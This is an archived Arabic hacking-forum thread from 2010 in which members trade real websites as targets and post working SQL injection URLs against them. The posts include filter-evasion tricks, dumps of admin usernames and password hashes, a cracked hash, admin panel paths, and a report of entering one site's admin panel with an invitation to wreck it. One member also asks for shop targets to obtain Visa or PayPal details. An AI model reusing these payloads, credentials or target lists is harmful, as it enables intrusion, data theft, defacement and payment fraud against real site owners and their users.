:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   SQL قواعد البيانات (http://www.vbspiders.com/vb/f133.html)
-   -   العدد (3) من غرفة الحقن (http://www.vbspiders.com/vb/t39268.html)

agentsimo 12-12-2010 10:05 PM

السلام عليكم شباب كيف احولكم ?
هل حقنتي السابقة صحيحة ?
و هل من هدف جديد ?

aircrack -ng 12-12-2010 10:14 PM

اقتباس:

المشاركة الأصلية كتبت بواسطة _darkman_ (المشاركة 267083)
أخي صمودة
بالنسبة للأنترنت
أنا أيضا 256 ميقا بايت
نتاع الزواولة
ههههههههههههههههههههههههههه

هههههههههه انا استعمل موبي كوناكت تاع موبليس
يايما شحال ثقيلة ههههههههههههههه
نوكل عليهم ربي هههههههههههه

هدف جديد سهل الحقن وهذا اول موقع حقنته في بداتيتي في السكيول
ذكريات يعني هههههههههههa012

http://www.michaelkenna.net/publicat...tail.php?id=79

darkman.dz 12-12-2010 10:16 PM

اقتباس:

المشاركة الأصلية كتبت بواسطة agentsimo (المشاركة 267098)
السلام عليكم شباب كيف احولكم ?
هل حقنتي السابقة صحيحة ?
و هل من هدف جديد ?


أي حقنة ؟

agentsimo 12-12-2010 10:24 PM

تم الحقن
http://www.michaelkenna.net/publicat...ail.php?id=-79 UNION SELECT 1,2,3,4,5,6,7,8,9,group_concat(user,0x3a,password) ,11,12+from+tblUsers--

صفحة الادمين https://www.michaelkenna.net/admin/login.php
الهاشات لم افكها

aircrack -ng 12-12-2010 10:30 PM

اقتباس:

المشاركة الأصلية كتبت بواسطة agentsimo (المشاركة 267104)
تم الحقن
http://www.michaelkenna.net/publicat...ail.php?id=-79 UNION SELECT 1,2,3,4,5,6,7,8,9,group_concat(user,0x3a,password) ,11,12+from+tblUsers--

صفحة الادمين https://www.michaelkenna.net/admin/login.php
الهاشات لم افكها

تسلم اخي
ممكن تعيرني شوية نت لانو النت تبعي بيموت هههههههههه:a09:
بطل اخي واصل
الهاش انا حاولت معه كثير بس ماقدرت افكو يمكن فيه احد الاخوان يقدر يفكو

agentsimo 12-12-2010 10:33 PM

_darkman_
************
يوجد في الصفحة السابقة اي صفحة 5 الرد التالت

agentsimo 12-12-2010 10:42 PM

عبد الصمد
********
ههههههههههه انا ايضا عندي النت تقيييلة نحن في المغرب طبقو علينا المحدودية ف النت و كترت الضغط على الشبكة هده العوامل تتقل النت انا اشتعمل موديم 3G
بالنسبة لهاش فجرب ان افك الاول استعملت هافيج فاعطاني -=notfound=- اضن هو هدا الباس

agentsimo 12-12-2010 10:44 PM

Plain text of e9fed4e7d2879e7c8c331629e9a4dde9 is -=notfound=-

agentsimo 12-12-2010 10:46 PM

هل من اهداف لشوب
لاني محتاج فيزا او بايبل لاقتني سيرفر كونتر ان شاء الله :c

إسلام العالم 12-13-2010 12:32 AM

إليكم وين صلت

أول الشي الموقع عليه حماية على أمر العواميد تم التخطي هكذا

بعدين في حماية على @@version تخطينا هكذا

الموقع عليه حماية على امر concat يا شباب تم التخطيب هكدا

اقتباس:

http://www.faddoul-trade.com/product-det.php?l=2&id=-11 UNION /*!SELECT*/ 1,unhex(hex(column_name)),3,4,5+from+information_s chema.columns+where+column_name +like+char(37, 112, 97, 115, 115, 37)
إسم الجدول : members

إسم عامود الباس : pass_word

إسم عامود اليوزر : public

باس :7684

اليوزر : 4

لا أعرف إذا الشغل صحيح أم لا

إسلام العالم 12-13-2010 01:06 AM

والله يا إخوة ما بخفي عليكم الموقع بدو شغل

Victors 12-13-2010 02:05 AM

السلام عليكم شباب

قلت قبل ما انام اجيب لكم موقع

اتفضلوا

http://www.aboutinphuket.com/phuket-...php?rest_id=21

الموقع سهل الحقن طلعت بيانات الادمن بس الباسوورد مشفر بطريقة غريبة

smilies9

يالله اشوفكم بكره تصبحوا على خير :)

root4x 12-13-2010 03:12 AM

امممم

اليوزر aip

الباس 1234

مسار لوحة التحكم admin

بس مادري ليش مو راضي يدخل :(

انتو حاولو و شوفو

aircrack -ng 12-13-2010 01:31 PM

اقتباس:

المشاركة الأصلية كتبت بواسطة إسلام العالم (المشاركة 267172)
إليكم وين صلت

أول الشي الموقع عليه حماية على أمر العواميد تم التخطي هكذا



بعدين في حماية على @@version تخطينا هكذا



الموقع عليه حماية على امر concat يا شباب تم التخطيب هكدا



إسم الجدول : members

إسم عامود الباس : pass_word

إسم عامود اليوزر : public

باس :7684

اليوزر : 4

لا أعرف إذا الشغل صحيح أم لا

هلا اخي
تخطي مشكل معرفة الاصدار

كود:


http://www.faddoul-trade.com/product-det.php?l=2&id=-11 UNION /*!SELECT*/ 1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,4,5

/*!CONCAT
الموقع مانع كلمة concat
والتخطي ب


كود:

/*!CONCAT
كود:

http://www.faddoul-trade.com/product-det.php?l=2&id=-11 UNION /*!SELECT*/ 1,/*!CONCAT(table_name,0x3a,column_name,0x3a,table_schema) ,3,4,5+from+information_schema.columns
على فكرة الموقع مانع الامر group_ الاستعلام بlimit
فيه جدول واحد فقط
كود:

http://www.faddoul-trade.com/product-det.php?l=2&id=-11 UNION /*!SELECT*/ 1,/*!CONCAT(table_name,0x3a,column_name,0x3a,table_schema) ,3,4,5+from+information_schema.columns+where+column_name+LIKE+CHAR(37, 112, 97, 115, 115, 37)
جدول اليوزر

كود:

http://www.faddoul-trade.com/product-det.php?l=2&id=-11 UNION /*!SELECT*/ 1,/*!CONCAT(table_name,0x3a,column_name,0x3a,table_schema) ,3,4,5+from+information_schema.columns+where+table_name=0x6d656d62657273+limit+1,1
الحقنة كاملة

كود:

http://www.faddoul-trade.com/product-det.php?l=2&id=-11 UNION /*!SELECT*/ 1,UNHEX(HEX(/*!CONCAT(user_name,0x3a,id,0x3a,pass_word))) ,3,4,5+from+members
وللبحث عن شيخ القبيلة استعمل limit

aircrack -ng 12-13-2010 01:44 PM

اقتباس:

المشاركة الأصلية كتبت بواسطة Victors (المشاركة 267208)
السلام عليكم شباب

قلت قبل ما انام اجيب لكم موقع

اتفضلوا

http://www.aboutinphuket.com/phuket-...php?rest_id=21

الموقع سهل الحقن طلعت بيانات الادمن بس الباسوورد مشفر بطريقة غريبة

smilies9

يالله اشوفكم بكره تصبحوا على خير :)

الحقنة كاملة

كود:

http://www.aboutinphuket.com/phuket-about-restaurant-detail.php?rest_id=-21 UNION SELECT 1,group_concat(admin_name,0x3a,admin_id,0x3a,admin_pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+admin--
اليوزر aip
الباس j4**c+p(aip)

مسار اللوحة
http://www.aboutinphuket.com/admin/

تم دخولي للوحة في انتضاركم اخوتي للقضاء عليه


الساعة الآن 04:37 AM


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0